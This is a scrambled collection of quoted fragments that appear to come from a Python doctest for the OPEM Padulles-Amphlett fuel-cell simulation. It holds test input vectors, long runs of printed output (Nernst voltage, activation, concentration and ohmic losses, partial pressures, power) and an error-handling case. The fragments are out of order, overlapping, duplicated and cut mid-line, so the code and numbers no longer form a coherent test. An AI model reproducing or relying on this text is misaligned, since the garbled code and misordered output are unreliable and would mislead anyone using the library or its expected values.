PH2O :", ": 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal :", "V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power :", "Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O", "1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V Eta Activation :", "atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V", "Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V Eta", ": 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E :", ": 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC", ": 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V", "FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955", "0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031", ": 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O :", "########### I : 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V", ": 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V", "Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V Eta", ": 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal :", "V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage :", "0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605", "FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407", "V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage :", "Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271", ": 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 :", "FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966", ": 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC", "PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal", ": 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration", "0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power", "PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ###########", "Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic :", "0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage", "0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage", "atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W", "Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency :", ": 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O :", "FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm", ": 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E :", "0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC", "FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270", "Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2", "atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V", "0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage", "0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 :", "atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W", "PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ###########", "0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage", "Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812", "0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296", "atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W", ": 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 :", "PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal", "atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V", "########### I : 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V", "0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993", "atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2", "FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm", ": 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration", "0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298", "atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V", "PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ###########", ": 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC", ": 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E :", "V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage :", "Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W", "-5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss :", ": 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC", ": 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2", ": 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal :", "Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032", "V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm", ": 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 :", "V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm", "FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824", ": 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC", "* >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ###########", "atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V", "Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298", "Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2", "Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2", ": 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss", "0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886", "Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W", "V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm", "0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216", "E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836", "atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W", "V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power :", "N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)", "V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm", ": 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I", "Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564", "0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss :", "V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic", "to minus amount of V, please check your inputs Done! >>> shutil.rmtree(\"Padulles-Amphlett\") '''", "V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency", "W ########### I : 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398", "Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2", "Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V", ": 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I", "E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668", "Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic :", "FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544", "Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell", "V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic", "6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta", "Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector,", "Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427", "Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2", "Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V", "W ########### I : 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751", "FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484", "I : 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta", "PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal", "V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power :", ": 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 :", "W ########### I : 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836", "Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V", "0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075", "Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic :", "4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034", "0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power", "V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm", ": 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC", "6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta", ": 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O :", ": 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V Eta Activation", "0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss :", "Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O", "0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I :", "5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 :", ": 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V", "atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3", "FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725", "FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819", ": 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC", ": 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I", "PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal", ": 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC", "0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is", "0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration :", ": 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V Eta Activation", ": 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC", ": 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V", "FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525", "0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271", ": 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 :", "W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239", ": 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O :", "W ########### I : 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906", "V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency", "V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic", "0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046", "V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic", "V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm", "3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204", "FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm", "Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728", "FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285", "Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency :", "0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I :", "0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss :", "Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic :", "import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation", "0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage", ": 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V", "W ########### I : 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729", ": 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC", "FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm", "########### I : 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V", "4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498", "PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal", ": 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O :", "0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss :", "V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic", "Power-Thermal : 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V Eta", ": 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O :", "0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302", ">>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4,", "V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm", "Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency :", "V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic", ": 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V", "Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617", "V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power :", "Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency :", "I : 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta", ": 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I", "0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095", "Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic :", "Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation", "V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency", "Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735", ": 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC", "I : 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta", ". . I : 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518", ">>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error", "0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673", "Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664", "from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ###########", "Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V", "V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power :", "V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm", "V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage :", ": 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2", ": 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal :", "PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ###########", ": 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration", "atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W", ": 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss", "V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm", "Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V", ": 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I", ": 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC", ": 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I", "-9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932", "E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498", "atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W", ": 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V", "W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954", "V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency", ": 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V", "FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456", "Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency :", "FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206", "V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm", "V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage :", ": 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC", "2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration :", ": 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I", "Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243", ": 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E :", "V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm", "V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm", "Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O", "V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm", "Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494", "atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6", "Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V", "... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5]", "4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998", "6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta", "Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2", ": 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 :", "PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal", ": 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal :", "E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493", ": 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 :", "Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O", ": 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal :", ": 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration", ". I : 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V", "0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I :", "atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9", ": 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V", ": 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O :", "0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss :", "0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I :", ": 6.068401658824337 V Eta Activation : 